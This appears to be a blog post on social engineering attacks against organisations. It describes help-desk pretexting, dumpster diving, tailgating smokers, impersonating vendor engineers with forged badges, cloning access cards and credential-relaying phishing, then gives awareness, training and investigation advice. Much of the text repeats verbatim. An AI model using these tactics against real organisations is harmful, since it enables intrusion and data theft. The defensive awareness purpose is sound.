These points would typically be the first steps as the attacker never has to enter the building to gain access to sensitive information about the organisation. This raises and interesting question, since people are volunteering the information has the attacker broken any laws ? Also if the bins are in a publicly accessible / shared area has the attacker broken any laws by "dumpster diving" ?
An attacker could also just walk in the front door, past security and reception staff. Mornings and lunchtimes are always a good time to attempt this as there is a constant flow of people leaving and going in to the building.
Other common entry points would be via the car park. But by far the best way in is with the smokers. The attacker will hang around outside and start chatting to other smokers and then just walk into the building with them. Once in the building its easier to move around because if your there people assume that your supposed to be there, after all you've been seen outside smoking and talking with genuine employees. An attacker may then install various keyloggers , covert wireless access points or other bugging devices. Even something as simple as walking up to a printer and taking "your" printout will go unnoticed.
The likelihood of the above attacks been detected are low.
Prevention of some of these types of attacks can also be difficult.
The physical security of the building and its associated property should be monitored by a combination of monitored cctv and security guards. Bins should be locked and / or held in a secure area until they are collected.
Now for the IT side of things. This is normally shorter as the trick is to get into the building. The majority of the time sensitive data in not stored on employees computers or laptops but in servers. These servers are typically stored in locked rooms that are secured by a physical lock and or an electronic lock such as a swipe card or proximity card. Access is generally restricted to a few IT staff. If the attacker wanted to gain access to this room for whatever reason, stealing the physical hardware for example, they would first need to out who has access to the room and then attempt to covertly copy their access card.
Often if the attacker really needs to access server stored data, its more efficient to attempt to "hack" into the network from the inside or even simply find a desk and call the IT department and ask them to reset "your" password.
The attacker may even simply pick up a laptop and walk out.
If the attacker really needs access to the server room they may pose as a engineer from one of the organisations 3rd party support vendors or even from the local telecoms company. A little work with some logo's downloaded from the vendors website, a colour printer and a laminator or plastic card printer are all that's needed to add credibility to the attackers "story" as to why access is needed. Add in a few businesses cards with the "office" phone number and a work order and the attacker may even be given unsupervised access to the server room or other sensitive areas of the business such as meeting and conference rooms.
The more high tech attacks are normally associated with phishing style attacks where an attacker will setup a fake website to look identical to the organisations and a URL that closely matches the organisations. The attacker will typically focus on the logon page or other page that prompt the user for sensitive information. The end user will typically not know that their details have been "stolen". In the more sophisticated version of this attack the attacker will capture the user data and then "send" that data to the genuine site for processing. If the details are correct to user will be presented with a valid session if not they will get the standard logon failed message.
Now the people side of things is always going to be the hard part to protect yourself from.
Staff will need to be trained on the Do's and Don'ts of both the security surrounding the building and the IT systems.
The help desk staff should be trained to ask specific security questions in order to verify the identity of user, relying on caller id or someones post code, zip code or date of birth is not sufficient. Caller id is easy to fake and a persons home address is not too difficult to obtain.
Reception staff, PA's and sectaries are your first line of defence against telephone style attacks. These staff members should be trained in filtering out the false calls from the genuine. Keep in mind that not all false callers can stopped here but can at least be slowed down.
All employees should be made to feel comfortable to challenge people who they personally do not recognise or any "employee" not displaying a valid id card.
All non employee visitors the building should be escorted everywhere.
Visitors should not be given access to the organisations network unless authorised.
Be wary of IP telephones in semi public areas such as a reception area, as these phones are connected to the organisations internal network and typically have two network ports all an attacker would need to do is connect their laptop to the IP phone to connect to the organisations network. The same applies to wired / wireless internet access for guests. Guest internet access should be on a separate network segment or vlan with deny access to the corporate lan.
Do you think you would fall victim to a social engineering attack.?Ask yourself the following questions:
Do I know everyone in the building ?
Would I hold a access controlled (swipe / proximity card) door open for someone if they were carrying something ?
Would I challenge someone if I could not see their employee id badge ?
Would I lend mine to someone who approached me at the coffee machine if they said they left theirs in their car ?
Would I let someone in if I saw then chatting to one of the PA's or secretaries ?
If someone called me on an internal extension claiming to be from the IT department would I give them my password ?
People are the weak link in the chain here. An attacker will use peoples natural willingness to help against then. This is why social engineering attacks work, its because they are allowed to work.
Investigating these type of attack.
The fact that you know an attack has taken place is a good start.
How was it detected ?
When was it detected ?
When did the attack take place ?
How was the attack carried out ?
How to investigate this type of attack is one that needs to be handled carefully. The aim really being "How did someone manage to steal our assets? Be that information or hardware or both."
This would typically start with interviewing any persons identified from the previous questions. One thing to keep in mind is that people will feel embarrassed about coming forward and talking about the "attack".
They may feel guilty about any information they may have divulged. I would suggest that a third party conduct these interviews anonymously, ie. people do not have to give their names to the interviewer and the interview is carried out in confidence that no disciplinary action will be taken. The attack will have succeeded because of either a lack of controls or the lack of proper implementation, monitoring and enforcement of controls. Take the employee id card as an example. Most policies state that "employees are required to have their ID cards visible at all times". Is this true for the organisation ? Is this policy actually enforced ? In my experience the companies that enforce this are few and far between.
The results of these attacks will usually result in your staff been more aware of just how easy it is to leak data without even knowing it. I feel that an organisation should notify all its staff when an social engineering style attack has been discovered so they may all learn from it. Remember that your staff are your first line of defence against a social engineer.
One thing you need to be aware of is that social engineering is not just limited to IT systems it is an issue for the entire organisation.
Social engineering attacks can vary from low tech to high tech.
There are many factors that can lead to a successful social engineering attack.
Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.
Organisations need to be aware of just how much information they are giving away on their websites.
Its also common practice in organisations that a users email address will be the same as their network user name. The password for email may also be the same as the network logon, this is normally true in situations where a organisation is using Microsoft Exchange.
Armed with this information an attacker may call the help desk posing as someone in a senior position in the organisation asking for "help" on how to connect to the network from home. Help desk staff have been surprisingly helpful to me in the past when I have attempted this type of attack.
An attacker may also pose as a sales rep or as an employee of a IT related magazine or journal or even as someone seeking employment and ask to speak to the help desk / IT department. When connected they would ask a series of questions relating to the computer systems in place. Such as operating systems ( Windows, Apple Mac's, Linux / Unix) network infrastructure, wireless, remote access, web based email etc.
This information can help an attacker target specific areas of the network, such as wireless access points or remote access systems.
Also organisations will typically have large bins outside the premises, around the back, near the car park, basement level etc. Since the bins are collected and / or emptied by third parties access to them is rarely restricted.
The amount of information that can be recovered from looking through a companies rubbish can be very rewarding. Such as customer records, employee records, financial statements and other sensitive company data. This style of attack is commonly known as "dumpster diving".
These points would typically be the first steps as the attacker never has to enter the building to gain access to sensitive information about the organisation. This raises and interesting question, since people are volunteering the information has the attacker broken any laws ? Also if the bins are in a publicly accessible / shared area has the attacker broken any laws by "dumpster diving" ?
An attacker could also just walk in the front door, past security and reception staff. Mornings and lunchtimes are always a good time to attempt this as there is a constant flow of people leaving and going in to the building.
Other common entry points would be via the car park. But by far the best way in is with the smokers. The attacker will hang around outside and start chatting to other smokers and then just walk into the building with them. Once in the building its easier to move around because if your there people assume that your supposed to be there, after all you've been seen outside smoking and talking with genuine employees. An attacker may then install various keyloggers , covert wireless access points or other bugging devices. Even something as simple as walking up to a printer and taking "your" printout will go unnoticed.
The likelihood of the above attacks been detected are low.
Prevention of some of these types of attacks can also be difficult.
The physical security of the building and its associated property should be monitored by a combination of monitored cctv and security guards. Bins should be locked and / or held in a secure area until they are collected.
Now for the IT side of things. This is normally shorter as the trick is to get into the building. The majority of the time sensitive data in not stored on employees computers or laptops but in servers. These servers are typically stored in locked rooms that are secured by a physical lock and or an electronic lock such as a swipe card or proximity card. Access is generally restricted to a few IT staff. If the attacker wanted to gain access to this room for whatever reason, stealing the physical hardware for example, they would first need to out who has access to the room and then attempt to covertly copy their access card.
Often if the attacker really needs to access server stored data, its more efficient to attempt to "hack" into the network from the inside or even simply find a desk and call the IT department and ask them to reset "your" password.
The attacker may even simply pick up a laptop and walk out.
If the attacker really needs access to the server room they may pose as a engineer from one of the organisations 3rd party support vendors or even from the local telecoms company. A little work with some logo's downloaded from the vendors website, a colour printer and a laminator or plastic card printer are all that's needed to add credibility to the attackers "story" as to why access is needed. Add in a few businesses cards with the "office" phone number and a work order and the attacker may even be given unsupervised access to the server room or other sensitive areas of the business such as meeting and conference rooms.
The more high tech attacks are normally associated with phishing style attacks where an attacker will setup a fake website to look identical to the organisations and a URL that closely matches the organisations. The attacker will typically focus on the logon page or other page that prompt the user for sensitive information. The end user will typically not know that their details have been "stolen". In the more sophisticated version of this attack the attacker will capture the user data and then "send" that data to the genuine site for processing. If the details are correct to user will be presented with a valid session if not they will get the standard logon failed message.
Now the people side of things is always going to be the hard part to protect yourself from.
Staff will need to be trained on the Do's and Don'ts of both the security surrounding the building and the IT systems.
The help desk staff should be trained to ask specific security questions in order to verify the identity of user, relying on caller id or someones post code, zip code or date of birth is not sufficient. Caller id is easy to fake and a persons home address is not too difficult to obtain.
Reception staff, PA's and sectaries are your first line of defence against telephone style attacks. These staff members should be trained in filtering out the false calls from the genuine. Keep in mind that not all false callers can stopped here but can at least be slowed down.
All employees should be made to feel comfortable to challenge people who they personally do not recognise or any "employee" not displaying a valid id card.
All non employee visitors the building should be escorted everywhere.
Visitors should not be given access to the organisations network unless authorised.
Be wary of IP telephones in semi public areas such as a reception area, as these phones are connected to the organisations internal network and typically have two network ports all an attacker would need to do is connect their laptop to the IP phone to connect to the organisations network. The same applies to wired / wireless internet access for guests. Guest internet access should be on a separate network segment or vlan with deny access to the corporate lan.
Do you think you would fall victim to a social engineering attack.?Ask yourself the following questions:
Do I know everyone in the building ?
Would I hold a access controlled (swipe / proximity card) door open for someone if they were carrying something ?
Would I challenge someone if I could not see their employee id badge ?
Would I lend mine to someone who approached me at the coffee machine if they said they left theirs in their car ?
Would I let someone in if I saw then chatting to one of the PA's or secretaries ?
If someone called me on an internal extension claiming to be from the IT department would I give them my password ?
People are the weak link in the chain here. An attacker will use peoples natural willingness to help against then. This is why social engineering attacks work, its because they are allowed to work.
Investigating these type of attack.
The fact that you know an attack has taken place is a good start.
How was it detected ?
When was it detected ?
When did the attack take place ?
How was the attack carried out ?
How to investigate this type of attack is one that needs to be handled carefully. The aim really being "How did someone manage to steal our assets? Be that information or hardware or both."
This would typically start with interviewing any persons identified from the previous questions. One thing to keep in mind is that people will feel embarrassed about coming forward and talking about the "attack".
They may feel guilty about any information they may have divulged. I would suggest that a third party conduct these interviews anonymously, ie. people do not have to give their names to the interviewer and the interview is carried out in confidence that no disciplinary action will be taken. The attack will have succeeded because of either a lack of controls or the lack of proper implementation, monitoring and enforcement of controls. Take the employee id card as an example. Most policies state that "employees are required to have their ID cards visible at all times". Is this true for the organisation ? Is this policy actually enforced ? In my experience the companies that enforce this are few and far between.
The results of these attacks will usually result in your staff been more aware of just how easy it is to leak data without even knowing it. I feel that an organisation should notify all its staff when an social engineering style attack has been discovered so they may all learn from it. Remember that your staff are your first line of defence against a social engineer.
Subscribe to:
Posts (Atom)
